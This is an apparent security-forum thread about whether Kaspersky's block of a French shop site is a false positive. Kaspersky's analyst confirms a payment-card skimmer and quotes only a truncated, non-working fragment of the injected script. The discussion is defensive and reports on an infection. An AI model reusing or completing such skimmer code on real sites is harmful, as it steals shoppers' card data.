JB007

Level 18
Verified
Hello,
KTS blocks the access to this site "francis-miot.com" because of the detection of "HEUR:Trojan-PSW.Script.Generic".
I know this site for many years and I never have any problem, so I think that it could be a false positive.
I checked with VT and there is 1 detection {VirusTotal} ; I also checked with Virus Desk and the answer is that this URL is unknown, so I submitted the URL ; I also opened a ticket with Kaspersky support.
I know that Kaspersky support is very slow, so I hope that you can help me...
miot.PNG
miot1.PNG
 

Lobito Punky

Level 13
Verified
According to Netcraft it is catalogued as "Shopping Site Skimmer Detected". I suggest you send an email to the site administrator which is as follows: contact (@) francis-miot (dot) com telling him about this incident. They must solve the problem that some antivirus like kaspersky or Netcraft extension mark as malicious the site.

You can search for references in Google: Shopping Site Skimmer Detected - Google Search
 

JB007

Level 18
Verified
According to Netcraft it is catalogued as "Shopping Site Skimmer Detected". I suggest you send an email to the site administrator which is as follows: contact (@) francis-miot (dot) com telling him about this incident. They must solve the problem that some antivirus like kaspersky or Netcraft extension mark as malicious the site.

You can search for references in Google: Shopping Site Skimmer Detected - Google Search
Also I've sent it to KVirusDesk, waiting for final verdict...
Thanks @Lobito Punky and @harlan4096
I have yet send the information to"francis-miot contact" on November 14th but get no answer until now.
 

Gandalf_The_Grey

Level 22
Verified
I visited the site without Mcafee giving any alerts and I don't think I'm infected.
But you haven't ordered and paid anything yet...
According to Netcraft:
What are shopping site skimmers?
A shopping site skimmer is a malicious script that steals your payment card information when you checkout on an online store, and sends it back to a fraudster to use later. Netcraft finds and detects shopping site skimmers on the Internet and blocks them in the Extension.
There could be a malicious script running on that website.
I would wait for the report of Kaspersky Virus Desk before buying anything on that site.
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
Final verdict from Kaspersky analyst:
Hello,

This is not a false alarm. This site is infected.

Here is the malicious code:

"<script>
function b64EncodeUnicode(str) {

...
,buildData());
}
}
};"

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Best regards,
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
For malicious/phishing URLs They usually take around 2 days to finally response... I got a 1st response confirming the detection, then I asked if a possible false positive and that is the final answer... and yes, this is the complete answer (only ommited the name of the analyst)...

To send my request just used Kaspersky Virus Desk and gave my email (@gmail) to confirm the final verdict...
 

JB007

Level 18
Verified
For malicious/phishing URLs They usually take around 2 days to finally response... I got a 1st response confirming the detection, then I asked if a possible false positive and that is the final answer... and yes, this is the complete answer (only ommited the name of the analyst)...

To send my request just used Kaspersky Virus Desk and gave my email (@gmail) to confirm the final verdict...
Thanks @harlan4096
I did the same steps but with "Kaspersky Virus Desk" in French...
 

JB007

Level 18
Verified
Yes this is the file included on the mail:
"
Merci de votre réponse monsieur
Je vous le renvoie en pièce jointe.

Bien à vous

malicious script.txt (0.01Mb) "
Are you sure that the script is incomplete ? If yes I can try to ask again.
NB: previously I received 2 mails from the support but the script was not visible...
 
Last edited:

Gandalf_The_Grey

Level 22
Verified
So malware detected and running on outdated software:
Website Malware & Security
  • Malware detected by scan (Critical Risk)
  • No injected spam detected (Low Risk)
  • No defacements detected (Low Risk)
  • No internal server errors detected (Low Risk)
  • Site is outdated (High Risk)